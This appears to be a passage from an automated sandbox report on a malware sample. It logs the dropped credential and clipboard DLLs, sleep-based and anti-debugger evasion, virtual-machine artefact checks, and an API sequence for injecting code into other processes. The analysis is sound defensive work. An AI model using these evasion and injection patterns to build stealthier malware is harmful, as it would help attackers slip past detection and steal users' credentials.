Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 8.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 1060 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 1060 Thread sleep time: -1470000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 5504 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 3940 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 1060 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00440EAD FindFirstFileExW, 4_2_00440EAD
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04911114 FindFirstFileExW, 4_2_04911114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00440EAD FindFirstFileExW, 24_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_04901114 FindFirstFileExW, 24_2_04901114
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00440EAD FindFirstFileExW, 36_2_00440EAD
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04951114 FindFirstFileExW, 36_2_04951114
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 4_2_00408180
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_6e74f07959bc23e75a6b77fd2553fb68ad4fabc_8822d4be_17748468-aec6-4998-b810-796a4d1a1ad0\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Dctooux.exe_c54a861aa4c43cc515c4d65c89eab2e3bda7e7c7_8822d4be_d2b7794f-7375-472a-8406-f114c8994e3a\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE50717000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE50716000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWdWndClass
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126420836.000002EE50783000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000002.3366637117.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000024.00000003.2896132724.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Dctooux.exe, 00000024.00000002.3366637117.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: GhLMDfzXqQ.exe, 00000000.00000003.2126474433.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp, GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5073B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GhLMDfzXqQ.exe, 00000000.00000002.2131615110.000002EE5077C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\3
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00439DBE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0042F2A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_0042F2A9
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 4_2_0043D5A2
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0043983B mov eax, dword ptr fs:[00000030h] 4_2_0043983B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_02DA2E9B push dword ptr fs:[00000030h] 4_2_02DA2E9B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048D0D90 mov eax, dword ptr fs:[00000030h] 4_2_048D0D90
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0490D809 mov eax, dword ptr fs:[00000030h] 4_2_0490D809
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048D092B mov eax, dword ptr fs:[00000030h] 4_2_048D092B
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_04909AA2 mov eax, dword ptr fs:[00000030h] 4_2_04909AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 24_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_0043983B mov eax, dword ptr fs:[00000030h] 24_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_02EF304B push dword ptr fs:[00000030h] 24_2_02EF304B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048C0D90 mov eax, dword ptr fs:[00000030h] 24_2_048C0D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048FD809 mov eax, dword ptr fs:[00000030h] 24_2_048FD809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048C092B mov eax, dword ptr fs:[00000030h] 24_2_048C092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048F9AA2 mov eax, dword ptr fs:[00000030h] 24_2_048F9AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 36_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0043983B mov eax, dword ptr fs:[00000030h] 36_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_02E34603 push dword ptr fs:[00000030h] 36_2_02E34603
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04910D90 mov eax, dword ptr fs:[00000030h] 36_2_04910D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0494D809 mov eax, dword ptr fs:[00000030h] 36_2_0494D809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0491092B mov eax, dword ptr fs:[00000030h] 36_2_0491092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04949AA2 mov eax, dword ptr fs:[00000030h] 36_2_04949AA2
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00442103 GetProcessHeap, 36_2_00442103
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Code function: 0_2_00007FF6A4F11180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 0_2_00007FF6A4F11180
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0042102F SetUnhandledExceptionFilter, 4_2_0042102F
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_004204FC
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00439DBE
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00420ECA
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F0763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_048F0763
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_0490A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0490A025
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_048F1131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_048F1131
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E0763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_048E0763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048FA025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_048FA025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 24_2_048E1131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_048E1131
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0042102F SetUnhandledExceptionFilter, 36_2_0042102F
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04930763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_04930763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_0494A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_0494A025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 36_2_04931131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_04931131

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 4_2_004074F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\GhLMDfzXqQ.exe Process created: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe "C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\Google Chrome\fud_new.exe Code function: 4_2_004210B6 cpuid 4_2_004210B6
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
